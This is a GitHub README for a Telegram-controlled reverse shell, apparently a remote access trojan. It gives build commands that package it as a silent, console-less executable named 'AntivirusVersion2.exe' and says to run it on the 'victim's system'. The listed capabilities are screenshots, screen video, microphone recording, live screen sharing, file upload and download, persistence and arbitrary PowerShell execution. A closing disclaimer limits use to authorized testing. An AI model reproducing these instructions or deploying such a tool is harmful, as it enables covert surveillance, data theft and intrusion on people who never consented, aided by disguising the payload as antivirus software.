Skip to content

Latest commit

 

History

18 Commits

Folders and files

NameName
Last commit message
Last commit date
 
 
 
 
 
 
 
 

Repository files navigation

👁️ Reverse-CLoUD v2 👁️

it's a Reverse Shell Connected telegram bot 👉 (It is a test and demonstration version)

📃 Needs editing :

✅ = Mandatory -- compulsory
❌ = optional -- voluntary

main.py :
 line 52 = Bot Token ✅
 line 53 = admin chat id  ✅
 line 54 = CMD_TIMEOUT ❌

⚠️ point :

Create a separate bot for each target.
Reason: Lack of session management.

You must execute the file on the victim's system using some method.⤵️

📩 Installation steps :

  • 1️⃣ Installing the repository :
git clone https://github.com/The-Lxx-CLoUD/Reverse-CLoUDv2
  • 2️⃣ Open the file :
cd Reverse-CLoUDv2
  • 3️⃣ edit the file :
👉 📃 Needs editing 👈
  • 4️⃣ installing requirements (only on your system) :
pip install requests 
pip install mss 
pip install sounddevice 
pip install numpy 
pip install opencv-python 
pip install Pillow
pip install pyinstaller
  • 5️⃣ Build :

1- Simple :

pyinstaller --onefile --noconsole --name "AntivirusVersion2" c2beta.py

2- best :

pyinstaller --onefile --noconsole --name "AntivirusVersion2" --add-data "c2beta.py;." --hidden-import "ctypes" --hidden-import "win32api" --hidden-import "win32com" --hidden-import "Crypto" --hidden-import "Crypto.Cipher" --hidden-import "Crypto.Util" --hidden-import "psutil" --hidden-import "requests" --hidden-import "pynput" --hidden-import "mss" --hidden-import "sounddevice" --hidden-import "cv2" --collect-all "Crypto" --collect-all "cv2" --collect-all "pynput" --collect-all "mss" --collect-all "sounddevice" c2beta.py
  • exe file in this folder ---> dist/AntivirusVersion2.exe

  • 6️⃣ Run exe file , in target pc 🔥

Now You can use this commands :

📚 Multi-Session Commands
Capture:
screenshot — Taking a screenshot 📸
screenvideo 10 — Video from screen 🎬 (1–60 seconds)
record 10 — Audio Recording 🎤 (1–60 seconds) 
screenshare — Send photo every 5 seconds 🖥️
screenshare_stop — Stop screen sharing 

Files:
upload C:\Users → Custom path 
download  (ex: download ali.png) → download file
cd (ex: cd C:/Users) → Custom path 
pwd → Current path 

System:
persist | exit

PowerShell Commands:
pwd -- ls -- cd C:/
ipconfig -- start C:/ali.exe and more...

dev : @lxxcloud

👤 Author

GitHub : 👉 @The-Lxx-CLoUD 👈

Telegram : 👉 @lxxcloud 👈

For educational and authorized security testing purposes only.
Use this tool only on systems you own or have explicit permission to test.
The user bears full responsibility for ensuring lawful use.
 The developer assumes no liability for any misuse or illegal activity associated with this tool.